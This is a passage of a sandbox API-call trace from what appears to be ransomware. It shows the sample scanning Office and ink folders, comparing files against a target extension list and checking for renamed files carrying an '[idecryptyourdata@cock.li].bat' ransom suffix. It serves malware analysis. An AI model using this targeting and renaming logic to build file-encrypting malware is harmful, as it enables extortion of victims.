shared\\ClickToRun\\IntegratedOffice.exe") returned 78 [0182.327] lstrlenW (lpString=".1cd") returned 4 [0182.327] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0182.327] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe") returned 78 [0182.327] lstrlenW (lpString=".jpg") returned 4 [0182.327] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0182.328] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe") returned 78 [0182.328] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe") returned 78 [0182.328] lstrlenW (lpString=".doc") returned 4 [0182.328] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0182.328] lstrlenW (lpString=".docx") returned 5 [0182.328] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1 [0182.328] lstrlenW (lpString=".pdf") returned 4 [0182.328] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0182.328] lstrlenW (lpString=".xls") returned 4 [0182.328] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0182.328] lstrlenW (lpString=".xlsx") returned 5 [0182.328] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1 [0182.328] lstrlenW (lpString=".ppt") returned 4 [0182.328] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0182.328] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe") returned 78 [0182.328] lstrlenW (lpString=".zip") returned 4 [0182.328] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0182.328] lstrlenW (lpString=".rar") returned 4 [0182.328] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0182.328] lstrlenW (lpString=".bz2") returned 4 [0182.328] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0182.328] lstrlenW (lpString=".7z") returned 3 [0182.328] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0182.328] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe") returned 78 [0182.328] lstrlenW (lpString=".dbf") returned 4 [0182.328] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0182.328] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe") returned 78 [0182.328] lstrlenW (lpString=".1cd") returned 4 [0182.329] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0182.329] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe") returned 78 [0182.329] lstrlenW (lpString=".jpg") returned 4 [0182.329] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0182.329] lstrcmpiW (lpString1=".mui", lpString2=".bat") returned 1 [0182.329] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0182.329] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x364 [0182.329] GetFileSizeEx (in: hFile=0x364, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=10752) returned 1 [0182.330] CloseHandle (hObject=0x364) returned 1 [0182.330] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui")) returned 0x20 [0182.330] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\tipresx.dll.mui.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0182.330] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0182.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0182.330] lstrlenW (lpString=".doc") returned 4 [0182.330] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0182.330] lstrlenW (lpString=".docx") returned 5 [0182.330] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0182.330] lstrlenW (lpString=".pdf") returned 4 [0182.330] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0182.330] lstrlenW (lpString=".xls") returned 4 [0182.330] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0182.330] lstrlenW (lpString=".xlsx") returned 5 [0182.330] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0182.330] lstrlenW (lpString=".ppt") returned 4 [0182.330] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0182.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0182.330] lstrlenW (lpString=".zip") returned 4 [0182.331] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0182.331] lstrlenW (lpString=".rar") returned 4 [0182.331] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0182.331] lstrlenW (lpString=".bz2") returned 4 [0182.331] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0182.331] lstrlenW (lpString=".7z") returned 3 [0182.331] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0182.331] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0182.331] lstrlenW (lpString=".dbf") returned 4 [0182.331] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0182.331] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0182.331] lstrlenW (lpString=".1cd") returned 4 [0182.331] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0182.331] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0182.331] lstrlenW (lpString=".jpg") returned 4 [0182.331] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0182.331] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0182.331] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0182.331] lstrlenW (lpString=".doc") returned 4 [0182.331] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0182.331] lstrlenW (lpString=".docx") returned 5 [0182.331] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0182.331] lstrlenW (lpString=".pdf") returned 4 [0182.331] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0182.331] lstrlenW (lpString=".xls") returned 4 [0182.331] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0182.331] lstrlenW (lpString=".xlsx") returned 5 [0182.331] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0182.332] lstrlenW (lpString=".ppt") returned 4 [0182.332] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0182.332] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0182.332] lstrlenW (lpString=".zip") returned 4 [0182.332] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0182.332] lstrlenW (lpString=".rar") returned 4 [0182.332] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0182.332] lstrlenW (lpString=".bz2") returned 4 [0182.332] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0182.332] lstrlenW (lpString=".7z") returned 3 [0182.332] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0182.332] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0182.332] lstrlenW (lpString=".dbf") returned 4 [0182.332] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0182.332] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0182.332] lstrlenW (lpString=".1cd") returned 4 [0182.332] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0182.332] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0182.332] lstrlenW (lpString=".jpg") returned 4 [0182.332] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0182.332] lstrcmpiW (lpString1=".mui", lpString2=".bat") returned 1 [0182.332] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0182.332] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x364 [0182.333] GetFileSizeEx (in: hFile=0x364, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=9728) returned 1 [0182.333] CloseHandle (hObject=0x364) returned 1 [0182.333] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui")) returned 0x20 [0182.333] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\tipresx.dll.mui.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0182.333] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.333] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0182.333] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0182.334] lstrlenW (lpString=".doc") returned 4 [0182.334] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0182.334] lstrlenW (lpString=".docx") returned 5 [0182.334] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0182.334] lstrlenW (lpString=".pdf") returned 4 [0182.334] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0182.334] lstrlenW (lpString=".xls") returned 4 [0182.334] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0182.334] lstrlenW (lpString=".xlsx") returned 5 [0182.334] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0182.334] lstrlenW (lpString=".ppt") returned 4 [0182.334] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0182.334] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0182.334] lstrlenW (lpString=".zip") returned 4 [0182.334] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0182.334] lstrlenW (lpString=".rar") returned 4 [0182.334] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0182.334] lstrlenW (lpString=".bz2") returned 4 [0182.334] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0182.334] lstrlenW (lpString=".7z") returned 3 [0182.334] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0182.334] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0182.334] lstrlenW (lpString=".dbf") returned 4 [0182.334] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0182.334] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0182.335] lstrlenW (lpString=".1cd") returned 4 [0182.335] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0182.335] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0182.335] lstrlenW (lpString=".jpg") returned 4 [0182.335] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0182.335] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0182.335] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0182.335] lstrlenW (lpString=".doc") returned 4 [0182.335] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0182.335] lstrlenW (lpString=".docx") returned 5 [0182.335] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0182.335] lstrlenW (lpString=".pdf") returned 4 [0182.335] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0182.335] lstrlenW (lpString=".xls") returned 4 [0182.335] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0182.335] lstrlenW (lpString=".xlsx") returned 5 [0182.335] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0182.335] lstrlenW (lpString=".ppt") returned 4 [0182.335] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0182.335] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0182.335] lstrlenW (lpString=".zip") returned 4 [0182.335] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0182.335] lstrlenW (lpString=".rar") returned 4 [0182.335] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0182.335] lstrlenW (lpString=".bz2") returned 4 [0182.336] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0182.336] lstrlenW (lpString=".7z") returned 3 [0182.336] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0182.336] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0182.336] lstrlenW (lpString=".dbf") returned 4 [0182.336] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0182.336] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0182.336] lstrlenW (lpString=".1cd") returned 4 [0182.336] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0182.336] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0182.336] lstrlenW (lpString=".jpg") returned 4 [0182.336] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0182.336] lstrcmpiW (lpString1=".mui", lpString2=".bat") returned 1 [0182.336] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0182.336] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x364 [0182.337] GetFileSizeEx (in: hFile=0x364, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=10240) returned 1 [0182.337] CloseHandle (hObject=0x364) returned 1 [0182.337] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui")) returned 0x20 [0182.337] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\tipresx.dll.mui.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0182.337] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.337] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0182.337] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0182.338] lstrlenW (lpString=".doc") returned 4 [0182.338] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0182.338] lstrlenW (lpString=".docx") returned 5 [0182.338] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0182.338] lstrlenW (lpString=".pdf") returned 4 [0182.338] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0182.338] lstrlenW (lpString=".xls") returned 4 [0182.338] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0182.338] lstrlenW (lpString=".xlsx") returned 5 [0182.338] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0182.338] lstrlenW (lpString=".ppt") returned 4 [0182.338] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0182.338] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0182.338] lstrlenW (lpString=".zip") returned 4 [0182.338] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0182.338] lstrlenW (lpString=".rar") returned 4 [0182.338] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0182.338] lstrlenW (lpString=".bz2") returned 4 [0182.338] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0182.338] lstrlenW (lpString=".7z") returned 3 [0182.338] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0182.338] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0182.338] lstrlenW (lpString=".dbf") returned 4 [0182.338] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0182.338] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0182.338] lstrlenW (lpString=".1cd") returned 4 [0182.338] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0182.338] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0182.338] lstrlenW (lpString=".jpg") returned 4 [0182.339] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0182.339] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0182.339] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0182.339] lstrlenW (lpString=".doc") returned 4 [0182.339] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0182.339] lstrlenW (lpString=".docx") returned 5 [0182.339] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0182.339] lstrlenW (lpString=".pdf") returned 4 [0182.339] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0182.339] lstrlenW (lpString=".xls") returned 4 [0182.339] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0182.339] lstrlenW (lpString=".xlsx") returned 5 [0182.339] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0182.339] lstrlenW (lpString=".ppt") returned 4 [0182.339] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0182.339] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0182.339] lstrlenW (lpString=".zip") returned 4 [0182.339] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0182.339] lstrlenW (lpString=".rar") returned 4 [0182.339] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0182.339] lstrlenW (lpString=".bz2") returned 4 [0182.339] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0182.339] lstrlenW (lpString=".7z") returned 3 [0182.339] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0182.339] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0182.339] lstrlenW (lpString=".dbf") returned 4 [0182.339] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0182.340] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0182.340] lstrlenW (lpString=".1cd") returned 4 [0182.340] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0182.340] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0182.340] lstrlenW (lpString=".jpg") returned 4 [0182.340] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0182.340] lstrcmpiW (lpString1=".mui", lpString2=".bat") returned 1 [0182.340] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0182.340] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x364 [0182.341] GetFileSizeEx (in: hFile=0x364, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=10752) returned 1 [0182.341] CloseHandle (hObject=0x364) returned 1 [0182.341] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui")) returned 0x20 [0182.341] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\tipresx.dll.mui.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0182.341] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.341] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\tipresx.dll.mui") returned 72 [0182.341] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\tipresx.dll.mui") returned 72 [0182.341] lstrlenW (lpString=".doc") returned 4 [0182.341] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0182.341] lstrlenW (lpString=".docx") returned 5 [0182.341] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0182.341] lstrlenW (lpString=".pdf") returned 4 [0182.341] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0182.341] lstrlenW (lpString=".xls") returned 4 [0182.341] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0182.341] lstrlenW (lpString=".xlsx") returned 5 [0182.341] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0182.341] lstrlenW (lpString=".ppt") returned 4 [0182.341] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0182.341] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\tipresx.dll.mui") returned 72 [0182.342] lstrlenW (lpString=".zip") returned 4 [0182.342] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0182.342] lstrlenW (lpString=".rar") returned 4 [0182.342] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0182.342] lstrlenW (lpString=".bz2") returned 4 [0182.342] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0182.342] lstrlenW (lpString=".7z") returned 3 [0182.342] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0182.342] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\tipresx.dll.mui") returned 72 [0182.342] lstrlenW (lpString=".dbf") returned 4 [0182.342] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0182.342] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\tipresx.dll.mui") returned 72 [0182.342] lstrlenW (lpString=".1cd") returned 4 [0182.342] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0182.342] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\tipresx.dll.mui") returned 72 [0182.342] lstrlenW (lpString=".jpg") returned 4 [0182.342] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0182.343] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\tipresx.dll.mui") returned 72 [0182.343] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\tipresx.dll.mui") returned 72 [0182.343] lstrlenW (lpString=".doc") returned 4 [0182.343] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0182.343] lstrlenW (lpString=".docx") returned 5 [0182.343] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0182.343] lstrlenW (lpString=".pdf") returned 4 [0182.343] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0182.343] lstrlenW (lpString=".xls") returned 4 [0182.343] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0182.343] lstrlenW (lpString=".xlsx") returned 5 [0182.343] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0182.343] lstrlenW (lpString=".ppt") returned 4 [0182.343] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0182.343] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\tipresx.dll.mui") returned 72 [0182.343] lstrlenW (lpString=".zip") returned 4 [0182.343] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0182.343] lstrlenW (lpString=".rar") returned 4 [0182.343] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0182.343] lstrlenW (lpString=".bz2") returned 4 [0182.343] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0182.343] lstrlenW (lpString=".7z") returned 3 [0182.343] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0182.343] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\tipresx.dll.mui") returned 72 [0182.343] lstrlenW (lpString=".dbf") returned 4 [0182.343] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0182.343] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\tipresx.dll.mui") returned 72 [0182.343] lstrlenW (lpString=".1cd") returned 4 [0182.343] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0182.344] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\tipresx.dll.mui") returned 72 [0182.344] lstrlenW (lpString=".jpg") returned 4 [0182.344] lstrcmpiW (lpString1=".jpg", 